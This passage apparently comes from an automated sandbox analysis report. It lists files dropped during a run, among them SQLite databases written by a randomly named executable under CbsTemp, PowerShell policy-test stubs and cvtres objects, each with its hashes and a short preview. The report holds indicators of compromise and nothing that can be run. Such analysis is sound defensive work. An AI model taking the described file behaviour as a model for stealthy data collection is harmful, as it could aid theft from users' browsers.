                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1628158735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                          MD5:3A925CB766CE4286E251C26E90B55CE8
                                                          SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                          SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                          SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                          Malicious:false
                                                          Preview:@...e................................................@..........

                                                          C:\Users\user\AppData\Local\Temp\0sxbh44YXu

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):155648
                                                          Entropy (8bit):0.5407252242845243
                                                          Encrypted:false
                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\CpvYgJX57w

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136413900497188
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DTEg3zrlZw

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8746135976761988
                                                          Encrypted:false
                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DsASdKgg0l

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Eqq9nzCkiv

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\JUU0sXoLL6

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):5242880
                                                          Entropy (8bit):0.03859996294213402
                                                          Encrypted:false
                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\QIkRuQZnGc

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\RES9645.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Sun Oct 20 17:18:49 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1928
                                                          Entropy (8bit):4.610078709293515
                                                          Encrypted:false
                                                          SSDEEP:48:9kLzWq482KqxmslmuulB+hnqXSfbNtmh7:9knWhfKqEs2TkZzNty7
                                                          MD5:40B5B46FC5A04E05DD97443F23282630
                                                          SHA1:07C7C0E923D16C6606E28DE86492865A17B5B1D1
                                                          SHA-256:4D78CF33A21AEBD632E94BD8D72C5851AABBED63805A527BEE55BCF3AEFEA7DF
                                                          SHA-512:F359C144DF01F043EA2AE0CCD0D491AC91664835A5EE4D4FE9D9E9B63552886E0FABD0CE87A40898826BCAAD7EBB8B2EDC9899FB088556C28FE16EECE67C8A25
                                                          Malicious:false
                                                          Preview:L...y;.g.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP......................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES9645.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

                                                          C:\Users\user\AppData\Local\Temp\RES97EB.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sun Oct 20 17:18:49 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1956
                                                          Entropy (8bit):4.5534351157851045
                                                          Encrypted:false
                                                          SSDEEP:24:HVO9/OX/qHmwKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:HX/qlKqxmEluOulajfqXSfbNtmh1Z
                                                          MD5:ECFAA6E0717A87E71ED8D046774ACD28
                                                          SHA1:D8D630019BA70F2EA5DB86C6872B90D5655BF6CC
                                                          SHA-256:56D72796D290175A8C7E506FAB82ED75B18939554617D3151AE90A7863ACA6EC
                                                          SHA-512:A766C632A90F549A0B76800DF16F76092F2D19E29AFDE8447B2587EF1133C3B8269599CB0C57B4DB75DCB14F13ED438DAB6543EBB7A3139CB664962B92CC409E
                                                          Malicious:false
                                                          Preview:L...y;.g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES97EB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                          C:\Users\user\AppData\Local\Temp\UTCvSGGNcU

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\WnTiLPw8UR

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):159744
                                                          Entropy (8bit):0.5394293526345721
                                                          Encrypted:false
                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\X7hwNCMJlv

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):14
                                                          Entropy (8bit):3.378783493486176
                                                          Encrypted:false
                                                          SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                          MD5:6CA4960355E4951C72AA5F6364E459D5
                                                          SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                          SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                          SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                          Malicious:false
                                                          Preview:{"Surveys":{}}

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01lfe3lu.rlq.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_110atnrm.uhg.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15olpcoq.bts.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1db05ahk.ak0.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sbpxxap.5zr.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dgyihnx.nlj.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2m5dno50.mu3.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rgon01u.aup.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2sj4twpq.nsk.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33lstfbx.2dz.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3msp5e0r.lsd.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40aa2k0c.qne.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43fbmw1q.4rb.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
